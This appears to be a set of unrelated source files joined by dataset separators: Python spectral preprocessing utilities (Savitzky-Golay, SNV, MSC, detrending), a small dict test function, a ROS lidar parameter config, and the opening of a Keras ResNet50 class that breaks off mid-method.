            tempdata[:, j] = tempdata[:, half_size]
        for j in range(p - half_size, p):
            tempdata[:, j] = tempdata[:, p - half_size - 1]
        # Convert index-space derivative to wavelength-space (assumes a
        # uniform wavelength step -- TODO confirm for non-uniform axes).
        if deriv > 0:
            x_step = wavelength[1] - wavelength[0]
            x_step = np.power(x_step, deriv)
            ab_sg = tempdata / x_step
        else:
            ab_sg = tempdata
        spec_sg_matrix = np.vstack((wavelength, ab_sg))
        return spec_sg_matrix
    def fit_transform(self, spec):
        '''Remember the wavelength axis and filter *spec*.'''
        self.wavelength = spec[0, :]
        spec_sg = self.sg(spec, self.window_size, self.polyorder, self.deriv)
        return spec_sg
    def transform(self, input_data):
        '''Filter new data; the wavelength axis must match the fitted one.'''
        input_wavelength = input_data[0, :]
        if not (input_wavelength == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        spec_sg = self.sg(input_data, self.window_size, self.polyorder, self.deriv)
        return spec_sg
class SGSNV(object):
    '''
    Savitzky-Golay + SNV: SG derivative/smoothing followed by the Standard
    Normal Variate transform (per-row centering and scaling).
    '''
    def __init__(self, window_size=11, polyorder=2, deriv=1):
        '''
        :param window_size: odd SG window length (points)
        :param polyorder: order of the local polynomial (>= deriv)
        :param deriv: derivative order (0 = smoothing only)
        '''
        self.window_size = window_size
        self.polyorder = polyorder
        self.deriv = deriv
        return
    def _snv(self, spec):
        '''SNV: per row, subtract the mean and divide by the std (ddof=1).'''
        wavelength = spec[0, :]
        ab = spec[1:, :]
        ab_snv = (ab - np.mean(ab, axis=1, keepdims=True)) / np.std(ab, axis=1, keepdims=True, ddof=1)
        spec_snv = np.vstack((wavelength, ab_snv))
        return spec_snv
    def _sg(self, spec, window_size=11, polyorder=2, deriv=1):
        '''
        Savitzky-Golay filter.
        :param spec: row 0 is the wavelength axis, rows 1.. are absorbances
        :param window_size: must be odd and bigger than 2
        :param polyorder: must be bigger than deriv
        :param deriv: derivative order
        :return: filtered matrix, same layout as *spec*
        '''
        try:
            # Builtin int/abs: np.int was removed in NumPy 1.24.
            window_size = abs(int(window_size))
            polyorder = abs(int(polyorder))
        except ValueError:
            raise ValueError("window_size and polyorder have to be of type int")
        if window_size % 2 != 1 or window_size < 2:
            raise ValueError("window_size size must be a positive odd number")
        if window_size < polyorder:  # polyorder must be less than window_size
            raise ValueError("window_size is too small for the polynomials polyorder")
        if deriv > polyorder:  # 'deriv' must be less than or equal to 'polyorder'
            raise ValueError("请调小导数阶数!")
        n = spec.shape[0] - 1  # number of spectra (row 0 is the axis)
        p = spec.shape[1]      # number of wavelength points
        wavelength = spec[0, :]
        half_size = window_size // 2
        # Design matrix of the local polynomial fit: coef[i, j] = (i - half)^j.
        coef = np.zeros((window_size, polyorder + 1))
        for i in range(coef.shape[0]):
            for j in range(coef.shape[1]):
                coef[i, j] = np.power(i - int(window_size / 2), j)
        c = dot(inv(dot(coef.T, coef)), coef.T)
        # Row `deriv` of c is the fitted coefficient of x^deriv; multiply by
        # deriv! to obtain the derivative value at the window centre.
        coefs = np.zeros(window_size)
        for k in range(window_size):
            if deriv == 0 or deriv == 1:
                coefs[k] = c[deriv, k]
            elif deriv == 2:
                coefs[k] = c[deriv, k] * 2
            elif deriv == 3:
                coefs[k] = c[deriv, k] * 6
            elif deriv == 4:
                coefs[k] = c[deriv, k] * 24
        # Filter the absorbance block (valid windows only).
        tempdata = np.zeros((n, p))
        ab = spec[1:, :]
        for j in range(0, p - window_size + 1):
            data_window = ab[:, j:j + window_size]
            new_y = dot(data_window, coefs[:, np.newaxis])  # coefs as a column vector
            tempdata[:, j + half_size] = new_y.ravel()
        # Pad both ends with the nearest computed value.
        for j in range(0, half_size):
            tempdata[:, j] = tempdata[:, half_size]
        for j in range(p - half_size, p):
            tempdata[:, j] = tempdata[:, p - half_size - 1]
        # Convert index-space derivative to wavelength-space (assumes uniform step).
        if deriv > 0:
            x_step = wavelength[1] - wavelength[0]
            x_step = np.power(x_step, deriv)
            ab_sg = tempdata / x_step
        else:
            ab_sg = tempdata
        spec_sg_matrix = np.vstack((wavelength, ab_sg))
        return spec_sg_matrix
    def sgsnv(self, spec, window_size=11, polyorder=2, deriv=1):
        '''SG derivative first, then SNV.'''
        spec_sg = self._sg(spec, window_size=window_size, polyorder=polyorder, deriv=deriv)
        spec_sg_snv = self._snv(spec_sg)
        return spec_sg_snv
    def fit_transform(self, spec):
        '''Remember the wavelength axis and apply SG + SNV to *spec*.'''
        self.wavelength = spec[0, :]
        spec_sg = self._sg(spec, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
        spec_sg_snv = self._snv(spec_sg)
        return spec_sg_snv
    def transform(self, input_data):
        '''Apply SG + SNV to new data; the wavelength axis must match.'''
        input_wavelength = input_data[0, :]
        if not (input_wavelength == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        spec_sg = self._sg(input_data, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
        spec_sg_snv = self._snv(spec_sg)
        return spec_sg_snv
class SNVDT(object):
    '''
    SNV + DT: Standard Normal Variate transform followed by quadratic
    de-trending of each spectrum.
    '''
    def __init__(self):
        pass

    def _snv(self, spec):
        '''SNV: per row, subtract the mean and divide by the std (ddof=1).'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        standardized = (absorbance - np.mean(absorbance, axis=1, keepdims=True)) \
            / np.std(absorbance, axis=1, keepdims=True, ddof=1)
        return np.vstack((x_axis, standardized))

    def _dt(self, spec):
        '''Remove the fitted order-2 polynomial trend from every row.'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        detrended = np.zeros(absorbance.shape)
        for row in range(absorbance.shape[0]):
            trend = lsr(x_axis, absorbance[row, :], order=2)['fit_value']
            detrended[row, :] = absorbance[row, :] - trend.ravel()
        return np.vstack((x_axis, detrended))

    def snvdt(self, spec):
        '''SNV first, then de-trending.'''
        return self._dt(self._snv(spec))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and apply SNV + DT to *spec*.'''
        self.wavelength = spec[0, :]
        return self._dt(self._snv(spec))

    def transform(self, input_data):
        '''Apply SNV + DT to new data; the wavelength axis must match.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self._dt(self._snv(input_data))
class SGSSL(object):
    '''
    SG + SSL 求导 + 减去一条直线: Savitzky-Golay derivative/smoothing followed
    by subtracting a least-squares straight line from each spectrum.
    '''
    def __init__(self, window_size=11, polyorder=2, deriv=1):
        '''
        :param window_size: odd SG window length (points)
        :param polyorder: order of the local polynomial (>= deriv)
        :param deriv: derivative order (0 = smoothing only)
        '''
        self.window_size = window_size
        self.polyorder = polyorder
        self.deriv = deriv
        return
    def _ssl(self, spec):
        '''Subtract each row's least-squares line vs. the wavelength axis.'''
        size_of_spec = spec.shape  # row 0 is the x axis
        wavelength = spec[0, :]
        spec_ssl = np.zeros(size_of_spec)
        spec_ssl[0, :] = wavelength
        f_add = np.ones(size_of_spec[1])  # intercept column for the design matrix
        matrix_A = (np.vstack((wavelength, f_add))).T
        for i in range(1, size_of_spec[0]):  # start at 1, skipping the axis row
            r = dot(dot(np.linalg.inv(dot(matrix_A.T, matrix_A)), matrix_A.T), spec[i, :])
            spec_ssl[i, :] = spec[i, :] - dot(matrix_A, r)
        return spec_ssl
    def _sg(self, spec, window_size=11, polyorder=2, deriv=1):
        '''
        Savitzky-Golay filter.
        :param spec: row 0 is the wavelength axis, rows 1.. are absorbances
        :param window_size: must be odd and bigger than 2
        :param polyorder: must be bigger than deriv
        :param deriv: derivative order
        :return: filtered matrix, same layout as *spec*
        '''
        try:
            # Builtin int/abs: np.int was removed in NumPy 1.24.
            window_size = abs(int(window_size))
            polyorder = abs(int(polyorder))
        except ValueError:
            raise ValueError("window_size and polyorder have to be of type int")
        if window_size % 2 != 1 or window_size < 2:
            raise ValueError("window_size size must be a positive odd number")
        if window_size < polyorder:  # polyorder must be less than window_size
            raise ValueError("window_size is too small for the polynomials polyorder")
        if deriv > polyorder:  # 'deriv' must be less than or equal to 'polyorder'
            raise ValueError("请调小导数阶数!")
        n = spec.shape[0] - 1  # number of spectra (row 0 is the axis)
        p = spec.shape[1]      # number of wavelength points
        wavelength = spec[0, :]
        half_size = window_size // 2
        # Design matrix of the local polynomial fit: coef[i, j] = (i - half)^j.
        coef = np.zeros((window_size, polyorder + 1))
        for i in range(coef.shape[0]):
            for j in range(coef.shape[1]):
                coef[i, j] = np.power(i - int(window_size / 2), j)
        c = dot(inv(dot(coef.T, coef)), coef.T)
        # Row `deriv` of c is the fitted coefficient of x^deriv; multiply by
        # deriv! to obtain the derivative value at the window centre.
        coefs = np.zeros(window_size)
        for k in range(window_size):
            if deriv == 0 or deriv == 1:
                coefs[k] = c[deriv, k]
            elif deriv == 2:
                coefs[k] = c[deriv, k] * 2
            elif deriv == 3:
                coefs[k] = c[deriv, k] * 6
            elif deriv == 4:
                coefs[k] = c[deriv, k] * 24
        # Filter the absorbance block (valid windows only).
        tempdata = np.zeros((n, p))
        ab = spec[1:, :]
        for j in range(0, p - window_size + 1):
            data_window = ab[:, j:j + window_size]
            new_y = dot(data_window, coefs[:, np.newaxis])  # coefs as a column vector
            tempdata[:, j + half_size] = new_y.ravel()
        # Pad both ends with the nearest computed value.
        for j in range(0, half_size):
            tempdata[:, j] = tempdata[:, half_size]
        for j in range(p - half_size, p):
            tempdata[:, j] = tempdata[:, p - half_size - 1]
        # Convert index-space derivative to wavelength-space (assumes uniform step).
        if deriv > 0:
            x_step = wavelength[1] - wavelength[0]
            x_step = np.power(x_step, deriv)
            ab_sg = tempdata / x_step
        else:
            ab_sg = tempdata
        spec_sg_matrix = np.vstack((wavelength, ab_sg))
        return spec_sg_matrix
    def sgssl(self, spec, window_size=11, polyorder=2, deriv=1):
        '''SG derivative first, then subtract a straight line.'''
        spec_sg = self._sg(spec, window_size=window_size, polyorder=polyorder, deriv=deriv)
        spec_sg_ssl = self._ssl(spec_sg)
        return spec_sg_ssl
    def fit_transform(self, spec):
        '''Remember the wavelength axis and apply SG + SSL to *spec*.'''
        self.wavelength = spec[0, :]
        spec_sg = self._sg(spec, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
        spec_sg_ssl = self._ssl(spec_sg)
        return spec_sg_ssl
    def transform(self, input_data):
        '''Apply SG + SSL to new data; the wavelength axis must match.'''
        input_wavelength = input_data[0, :]
        if not (input_wavelength == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        spec_sg = self._sg(input_data, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
        spec_sg_ssl = self._ssl(spec_sg)
        return spec_sg_ssl
# +++++++++++++++ Used for data +++++++++++++++
class MC4Data(object):
    '''Mean centering for plain data matrices (no wavelength row).'''
    def __init__(self, avg_data=None):
        # Column-mean row vector learned by fit/fit_transform.
        self.avg_data = avg_data

    def mc4data(self, data, avg_data=None):
        '''Subtract the column means (or *avg_data* when supplied).'''
        center = np.mean(data, axis=0, keepdims=True) if avg_data is None else avg_data
        return data - center

    def fit(self, data):
        '''Learn the column means of *data*.'''
        self.avg_data = np.mean(data, axis=0, keepdims=True)
        return self

    def fit_transform(self, data):
        '''Fit on *data* and return its centered version.'''
        self.fit(data)
        return self.mc4data(data, avg_data=self.avg_data)

    def transform(self, input_data):
        '''Center new data with the fitted means.'''
        return self.mc4data(input_data, avg_data=self.avg_data)

    def inverse_transform(self, data_mc):
        '''Add the fitted means back.'''
        return data_mc + self.avg_data
class ZS4Data(object):
    '''Z-score standardization for plain data matrices (no wavelength row).'''
    def __init__(self, avg_data=None, std_data=None):
        self.avg_data = avg_data
        self.std_data = std_data

    def zs4data(self, data, avg_data=None, std_data=None):
        '''Standardize columns with supplied or freshly computed statistics.'''
        if avg_data is None and std_data is None:
            centered = data - np.mean(data, axis=0)
            standardized = centered / np.std(centered, axis=0, ddof=1)
        elif avg_data is not None and std_data is not None:
            standardized = (data - avg_data) / std_data
        return standardized

    def fit(self, data):
        '''Learn column means (kept 2-D) and sample standard deviations.'''
        self.avg_data = np.mean(data, axis=0, keepdims=True)
        self.std_data = np.std(data - self.avg_data, axis=0, ddof=1)
        return self

    def fit_transform(self, data):
        '''Fit on *data* and return its standardized version.'''
        self.fit(data)
        return self.zs4data(data, avg_data=self.avg_data, std_data=self.std_data)

    def transform(self, input_data):
        '''Standardize new data with the fitted statistics.'''
        return self.zs4data(input_data, avg_data=self.avg_data, std_data=self.std_data)

    def inverse_transform(self, data_zs):
        '''Undo standardization with the fitted statistics.'''
        return data_zs * self.std_data + self.avg_data
# +++++++++++++++ Function 用于最小二乘回归 +++++++++++++++
def generate_polynomial(X, order=1):
    '''
    Build the least-squares design matrix [X^order, ..., X^2, X, 1]
    (higher powers first, intercept column last).
    :param X: (m,) or (m, n) predictor array
    :param order: polynomial order (>= 1)
    :return: (m, n*order + 1) design matrix
    '''
    if X.ndim == 1:
        X = X[:, np.newaxis]  # promote 1-D input to a column
    rows = X.shape[0]
    A = np.hstack((X, np.ones((rows, 1))))  # linear term + intercept
    for power in range(2, order + 1):  # prepend higher powers (high -> low)
        A = np.hstack((X ** power, A))
    return A
def lsr(X, y, order=1):  # default order: 1
    '''
    Least Square Regression 最小二乘回归 via the normal equations, with
    polynomial expansion of the predictors.
    :param X: (m,) or (m, n) predictor array
    :param y: (m,) or (m, 1) response vector
    :param order: 1, 2, 3... polynomial order for the fit
    :return: dict with
        regression_coefficient - coefficients, highest power first, intercept last
        fit_value - fitted values (m x 1 column vector)
        residual - fit_value - y (m x 1 column vector)
    :raises ValueError: if X and y disagree on the number of samples
    '''
    if X.ndim == 1:
        X = X[:, np.newaxis]  # promote 1-D input to a column
    if y.ndim == 1:
        y = y[:, np.newaxis]
    if X.shape[0] != y.shape[0]:
        raise ValueError('The number of samples is not equal!')
    # generate_polynomial already appends the intercept column.
    A = generate_polynomial(X, order=order)
    # Normal equations: b = (A^T A)^-1 A^T y.
    regression_coefficient = dot(dot(inv(dot(A.T, A)), A.T), y)
    fit_value = dot(A, regression_coefficient)
    residual = fit_value - y
    return {'regression_coefficient': regression_coefficient,
            'fit_value': fit_value,
            'residual': residual}
# ================ Function 用于光谱列表操作,不在PLS中直接使用 ================
# +++++++++++++++ 多样本操作,针对列 +++++++++++++++
def msc_list(spec_list, ideal_ab=None):
    '''
    Multiplicative Scatter Correction (MSC) over a list of single spectra,
    to remove scatter caused by uneven particle distribution and size.
    Each spectrum is regressed on the mean (or supplied ideal) spectrum,
    ab = c * ab_mean + d, and corrected as (ab - d) / c.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :param ideal_ab: optional reference absorbance, 1-D array (p,)
    :return: list of corrected 2-row arrays
    '''
    n = len(spec_list)
    if n == 1:
        raise ValueError('MSC针对多条光谱进行处理!')
    elif n > 1:
        wavelength = spec_list[0][0, :]
        ab_array = np.array([s[1, :] for s in spec_list])
        column_mean = np.mean(ab_array, axis=0)
        # Spectra outside the calibration set are corrected against the
        # calibration-set mean (ideal_ab).
        if ideal_ab is None:
            reference = column_mean
        elif len(ideal_ab) != len(column_mean):
            raise ValueError('数据点数不一致,输入参数有误!')
        else:
            reference = ideal_ab
        design = (np.vstack((reference, np.ones(ab_array.shape[1])))).T
        result_list = []
        for row in ab_array:
            # Least squares: slope c = b[0], offset d = b[1].
            b = dot(dot(np.linalg.inv(dot(design.T, design)), design.T), row)
            result_list.append(np.vstack((wavelength, (row - b[1]) / b[0])))
        return result_list
def sgmsc_list(spec_list, window_size=11, polyorder=2, deriv=1, ideal_ab=None):
    '''
    Savitzky-Golay derivative followed by MSC, applied to a list of spectra.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :param window_size: odd SG window length
    :param polyorder: order of the local polynomial (>= deriv)
    :param deriv: derivative order
    :param ideal_ab: optional MSC reference absorbance
    :return: list of corrected 2-row arrays
    '''
    n = len(spec_list)
    if n == 1:
        raise ValueError('MSC针对多条光谱进行处理!')
    elif n > 1:
        derived = sg_list(spec_list, window_size=window_size, polyorder=polyorder, deriv=deriv)
        return msc_list(derived, ideal_ab=ideal_ab)
def mc_list(spec_list, avg_ab=None):
    '''
    Mean centering (MC) over a list of single spectra: each wavelength
    channel has its (column) mean subtracted, so variation is studied
    around the mean rather than in absolute values.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :param avg_ab: optional pre-computed column means, 1-D array
    :return: list of centered 2-row arrays
    '''
    n = len(spec_list)
    if n == 1:
        raise ValueError('MC针对多条光谱进行处理!')
    elif n > 1:
        wavelength = spec_list[0][0, :]
        ab_array = np.array([s[1, :] for s in spec_list])
        center = np.mean(ab_array, axis=0) if avg_ab is None else avg_ab
        centered = ab_array - center  # broadcast
        return [np.vstack((wavelength, centered[i, :])) for i in range(n)]
def zs_list(spec_list, avg_ab=None, std_ab=None):
    '''
    Autoscaling (z-score standardization) over a list of single spectra:
    each column has its mean subtracted and is divided by its sample
    standard deviation, giving mean 0 / variance 1 per wavelength channel.
    Scaling matters when variables have very different value ranges, since
    larger-variance variables dominate regression otherwise.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :param avg_ab: optional pre-computed column means, 1-D array
    :param std_ab: optional pre-computed column standard deviations, 1-D array
    :return: list of standardized 2-row arrays
    '''
    n = len(spec_list)
    if n == 1:
        raise ValueError('MC针对多条光谱进行处理!')
    elif n > 1:
        wavelength = spec_list[0][0, :]
        ab_array = np.array([s[1, :] for s in spec_list])
        if avg_ab is None and std_ab is None:
            centered = ab_array - np.mean(ab_array, axis=0)
            scale = np.std(centered, axis=0, ddof=1)
        elif avg_ab is not None and std_ab is not None:
            centered = ab_array - avg_ab
            scale = std_ab
        standardized = centered / scale
        return [np.vstack((wavelength, standardized[i, :])) for i in range(n)]
def avg_list(spec_list):  # average
    '''
    Average a list of single spectra into one mean spectrum.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :return: one 2-row array (wavelength, mean absorbance)
    '''
    n = len(spec_list)
    if n == 1:
        raise ValueError('MC针对多条光谱进行处理!')
    elif n > 1:
        wavelength = spec_list[0][0, :]
        mean_ab = np.mean(np.array([s[1, :] for s in spec_list]), axis=0)
        return np.vstack((wavelength, mean_ab))
# +++++++++++++++ 单样本操作,针对行 +++++++++++++++
def vn_list(spec_list):
    '''
    Vector Normalization (VN): scale each spectrum to unit Euclidean length,
    removing variance caused purely by differing measurement magnitudes.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :return: list of normalized 2-row arrays
    '''
    result_list = []
    for spec in spec_list:
        wavelength = spec[0, :]
        ab = spec[1, :]
        result_list.append(np.vstack((wavelength, ab / np.linalg.norm(ab))))
    return result_list
def snv_list(spec_list):
    '''
    Standard Normal Variate (SNV) transform, one spectrum at a time: each
    absorbance row is centered by its own mean and scaled by its own sample
    standard deviation (ddof=1). Used to remove particle-size, surface
    scattering and path-length effects in NIR diffuse-reflectance spectra.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :return: list of transformed 2-row arrays
    '''
    result_list = []
    for spec in spec_list:
        wavelength = spec[0, :]
        ab = spec[1, :]
        standardized = (ab - np.mean(ab)) / np.std(ab, ddof=1)
        result_list.append(np.vstack((wavelength, standardized)))
    return result_list
def eco_list(spec_list):
    '''
    Eliminate Constant Offset (ECO): shift each spectrum independently so
    that its minimum value becomes zero.
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :return: list of shifted 2-row arrays
    '''
    result_list = []
    for spec in spec_list:
        wavelength = spec[0, :]
        ab = spec[1, :]
        result_list.append(np.vstack((wavelength, ab - np.min(ab))))
    return result_list
def ssl_list(spec_list):  # the wavelength row is required
    '''
    Subtract Straight Line (SSL) -- same as linear de-trending.
    Per spectrum, the absorbance is regressed on the wavelength axis
    (ab = d * wavelength + f, solved via x = inv(A'A) A'b) and the fitted
    line is subtracted from the original spectrum.
    :param spec_list: list of 2-row arrays; row 0 is the wavelength axis,
                      row 1 the absorbance
    :return: list of de-trended 2-row arrays
    '''
    result_list = []
    for spec in spec_list:
        wavelength = spec[0, :]
        ab = spec[1, :]
        corrected = np.zeros(spec.shape)
        corrected[0, :] = wavelength
        # Design matrix: [wavelength, 1] columns for slope and intercept.
        design = (np.vstack((wavelength, np.ones(spec.shape[1])))).T
        coefs = dot(dot(np.linalg.inv(dot(design.T, design)), design.T), ab)
        corrected[1:, :] = ab - dot(design, coefs)
        result_list.append(corrected)
    return result_list
def mmn_list(spec_list, norm_min=0, norm_max=1):  # min max normalize
    '''
    Min-max normalization: linearly rescale each spectrum into the
    interval [norm_min, norm_max].
    :param spec_list: list of 2-row arrays (wavelength, absorbance)
    :param norm_min: lower bound of the target range
    :param norm_max: upper bound of the target range
    :return: list of rescaled 2-row arrays
    '''
    result_list = []
    for spec in spec_list:
        wavelength = spec[0, :]
        ab = spec[1, :]
        low, high = np.min(ab), np.max(ab)
        rescaled = norm_min + (ab - low) * (norm_max - norm_min) / (high - low)
        result_list.append(np.vstack((wavelength, rescaled)))
    return result_list
def sg_list(spec_list, window_size=11, polyorder=2, deriv=1):
    """Savitzky-Golay smoothing / differentiation of each spectrum.

    Fits a degree-`polyorder` polynomial in a sliding window and takes
    the `deriv`-th derivative of the fit at the window centre.  The edge
    samples (half a window on each side) are padded with the nearest
    computed value.  The derivative is converted from "per sample" to
    "per wavelength unit" assuming an equidistant wavelength axis.

    Fixes vs. the previous revision:
      * ``np.int`` (deprecated in NumPy 1.20, removed in 1.24) replaced
        with the builtin ``int``;
      * the derivative scaling now multiplies the kernel by ``deriv!``
        for any order, instead of hard-coded factors for deriv 2..4 only
        (orders >= 5 were silently wrong before);
      * a duplicated ``p = spec.shape[1]`` line was dropped.

    :param spec_list: list of 2-row spectra (row 0 wavelength, row 1 absorbance)
    :param window_size: odd window length, must be > 2
    :param polyorder: polynomial degree, must be >= deriv
    :param deriv: derivative order (0 = smoothing only)
    :return: list of processed spectra
    """
    try:
        window_size = abs(int(window_size))
        polyorder = abs(int(polyorder))
    except ValueError:
        raise ValueError("window_size and polyorder have to be of type int")
    if window_size % 2 != 1 or window_size < 2:
        raise ValueError("window_size size must be a positive odd number")
    if window_size < polyorder:  # polyorder must be less than window_size
        raise ValueError("window_size is too small for the polynomials polyorder")
    if deriv > polyorder:  # 'deriv' must be less than or equal to 'polyorder'
        raise ValueError("请调小导数阶数!")
    half_size = window_size // 2
    result_list = []
    # Vandermonde-style design matrix: column j holds (i - centre)**j.
    coef = np.zeros((window_size, polyorder + 1))
    for i in range(window_size):
        for j in range(polyorder + 1):
            coef[i, j] = np.power(i - half_size, j)
    # Least-squares projection matrix; its row `deriv` is the SG kernel.
    c = dot(inv(dot(coef.T, coef)), coef.T)
    # The deriv-th derivative of the fitted polynomial at the window
    # centre equals deriv! * a_deriv, so scale the kernel by deriv
    # factorial (generalises the old hard-coded 2 / 6 / 24 factors).
    factorial = 1
    for d in range(2, deriv + 1):
        factorial *= d
    coefs = c[deriv, :] * factorial
    # Process each spectrum's absorbance row.
    for spec in spec_list:
        wavelength = spec[0, :]
        ab = spec[1, :]
        p = spec.shape[1]
        tempdata = np.zeros(p)
        # Convolve the kernel over every full window.
        for j in range(0, p - window_size + 1):
            tempdata[j + half_size] = inner(coefs, ab[j:j + window_size])
        # Pad both edges with the nearest computed value.
        tempdata[:half_size] = tempdata[half_size]
        tempdata[p - half_size:] = tempdata[p - half_size - 1]
        if deriv > 0:
            # Convert per-sample derivative to per-x-unit (uniform axis assumed).
            x_step = np.power(wavelength[1] - wavelength[0], deriv)
            ab_sg = tempdata / x_step
        else:
            ab_sg = tempdata
        result_list.append(np.vstack((wavelength, ab_sg)))
    return result_list
def sgsnv_list(spec_list, window_size=11, polyorder=2, deriv=1):
    """Savitzky-Golay filtering followed by SNV scatter correction.

    :param spec_list: list of 2-row spectra (wavelength row, absorbance row)
    :param window_size: SG window length (odd, > 2)
    :param polyorder: SG polynomial degree
    :param deriv: SG derivative order
    :return: list of SG-then-SNV processed spectra
    """
    return snv_list(sg_list(spec_list, window_size, polyorder, deriv))
def sgssl_list(spec_list, window_size=11, polyorder=2, deriv=1):
    """Savitzky-Golay filtering followed by SSL (subtract straight line).

    :param spec_list: list of 2-row spectra (wavelength row, absorbance row)
    :param window_size: SG window length (odd, > 2)
    :param polyorder: SG polynomial degree
    :param deriv: SG derivative order
    :return: list of SG-then-detrended spectra
    """
    return ssl_list(sg_list(spec_list, window_size, polyorder, deriv))
|
993,506 | de5fb3e0dfd8e5664b78b377e6abea106a2d4f09 | def testies():
    # Toy fixture: one url, two files per url, no sheet number.
    my_dict = {'url' : ['url1'], # list of urls
               'fnum' : [2], # number of files in each url
               'sheet': [None]} # sheet number of every file per url, respectively to url
    print(my_dict['url'], my_dict['sheet'])
    my_dict['path'] = []
    temp_sheet = []
    # Expand per-url entries into per-file entries: one path (and one
    # matching sheet value) for every file, so 'path' and 'sheet' end up
    # aligned element-for-element.
    for i, url in enumerate(my_dict['url']):
        for file in range(my_dict['fnum'][i]):
            path = url+'_'+str(file+1)
            print('extracting {}'.format(path))
            my_dict['path'].append(path)
            temp_sheet.append(my_dict['sheet'][i])
    # Replace the per-url sheet list with its per-file expansion.
    my_dict['sheet'] = temp_sheet
    print(my_dict)

if __name__ == "__main__":
testies() |
993,507 | 254550e20cfc447edfb7abbbadf43245779dc2a9 | #! /usr/bin/env python
PACKAGE='wj_716_lidar'
from dynamic_reconfigure.parameter_generator_catkin import *
#from math import pi
#from driver_base.msg import SensorLevels

# Dynamic-reconfigure parameter declarations for the WJ-716 lidar driver.
# Each gen.add() registers: name, type, reconfigure level, description,
# default, min, max.
gen = ParameterGenerator()
#       Name   Type   Reconfiguration level   Description   Default   Min   Max
gen.add("min_ang", double_t, 0, "The angle of the first range measurement [rad].", -3.14, -3.14, 3.14)
gen.add("max_ang", double_t, 0, "The angle of the last range measurement [rad].", 3.14, -3.14, 3.14)
# angle/time increments are fixed hardware characteristics (min == max == default).
gen.add("angle_increment",double_t, 0, "The angle_increment of the first range measurement [rad].", 0.00582, 0.00582, 0.00582)
gen.add("time_increment", double_t, 0, "The time_increment[s].", 0.00006167129, 0.00006167129, 0.00006167129)
gen.add("range_min", int_t, 0, "The range_min [m].", 0, 0, 30)
gen.add("range_max", int_t, 0, "The range_max[m].", 30, 0, 30)
gen.add("resize", int_t, 0, "The resize[num].", 811, 0, 811)
gen.add("frame_id", str_t, 0, "The TF frame in which laser scans will be returned.", "laser")
# Parameters below are kept (commented out) from the TiM3xx-based template.
#gen.add("intensity", bool_t, SensorLevels.RECONFIGURE_RUNNING, "Whether or not the TiM3xx returns intensity values.", True)
# gen.add("cluster", int_t, SensorLevels.RECONFIGURE_RUNNING, "The number of adjacent range measurements to cluster into a single reading.", 1, 0, 99)
#gen.add("skip", int_t, SensorLevels.RECONFIGURE_RUNNING, "The number of scans to skip between each measured scan.", 0, 0, 9)
# gen.add("port", str_t, SensorLevels.RECONFIGURE_CLOSE, "The serial port where the TiM3xx device can be found.", "/dev/ttyACM0")
# gen.add("calibrate_time", bool_t, SensorLevels.RECONFIGURE_CLOSE, "Whether the node should calibrate the TiM3xx's time offset.", True)
#gen.add("time_offset", double_t, SensorLevels.RECONFIGURE_RUNNING, "An offset to add to the time stamp before publication of a scan [s].", -0.001, -0.25, 0.25)
# Generate the .cfg support code; its status code becomes the exit status.
exit(gen.generate(PACKAGE, "wj_716_lidar", "wj_716_lidar"))
|
993,508 | 833ae1225e288dc63c7414bee6a0277f4083f212 | from tensorflow.keras.layers import Conv2D, BatchNormalization, Activation
from tensorflow.keras.layers import Input, ZeroPadding2D, MaxPooling2D, Add
from tensorflow.keras.layers import AveragePooling2D, Flatten, Dense
from tensorflow.keras.models import Model
from tensorflow.keras.initializers import glorot_uniform
class Resnet50:
    """Keras functional-API implementation of the ResNet50 architecture
    (He et al., "Deep Residual Learning for Image Recognition").

    Fix vs. the previous revision: the identity block applied a ReLU to
    the last convolution *before* the shortcut addition; in ResNet the
    pre-addition branch ends without activation and the ReLU follows the
    Add (as convolutional_block already did).
    """

    def __init__(self, input_shape, classes):
        """
        Constructor of Resnet50
        Arguments:
            input_shape -> tuple; Shape of input tensor
            classes -> integer; Number of classes
        """
        self.input_shape = input_shape
        self.classes = classes
        self.build_model()

    def main_path_block(self, x, filters, kernel_size, padding, conv_name, bn_name, activation=None, strides=(1, 1)):
        """
        Conv2D -> BatchNorm -> (optional) Activation building block
        Arguments:
            x -> tensor; Input Tensor
            filters -> integer; Number of filters in the convolutional layer
            kernel_size -> tuple; Size of the convolution kernel
            padding -> string; Type of padding in the convolutional layer
            conv_name -> string; Name of the convolutional layer
            bn_name -> string; Name of the batch normalization layer
            activation -> string or None; activation applied after BN (None = linear)
            strides -> tuple; Strides of the convolution
        Output:
            returns -> tensor; Transformed tensor
        """
        # Convolutional Layer
        x = Conv2D(
            filters=filters,
            kernel_size=kernel_size,
            strides=strides,
            padding=padding,
            name=conv_name,
            kernel_initializer=glorot_uniform(seed=0)
        )(x)
        # Batch Normalization Layer (axis 3 = channels of a channels-last tensor)
        x = BatchNormalization(axis=3, name=bn_name)(x)
        # Activation Layer
        if activation is not None:
            x = Activation(activation)(x)
        return x

    def identity_block(self, input_tensor, middle_filter_size, filters, stage, block):
        """
        Implementation of the Identity Block (shortcut without convolution;
        usable when input and output shapes match)
        Arguments:
            input_tensor -> tensor; Input Tensor (n, h, w, c)
            middle_filter_size -> integer; Size of filter in the middle convolutional block
            filters -> integer list; Number of filters in the convolutional blocks
            stage -> integer; Denotes position of the block in the network
            block -> string; Denotes name of the block
        Output:
            returns -> tensor; Output Tensor (h, w, c)
        """
        # Set the naming convention
        conv_name_base = 'res' + str(stage) + block + '_branch'
        batch_norm_name_base = 'batch_norm' + str(stage) + block + '_branch'
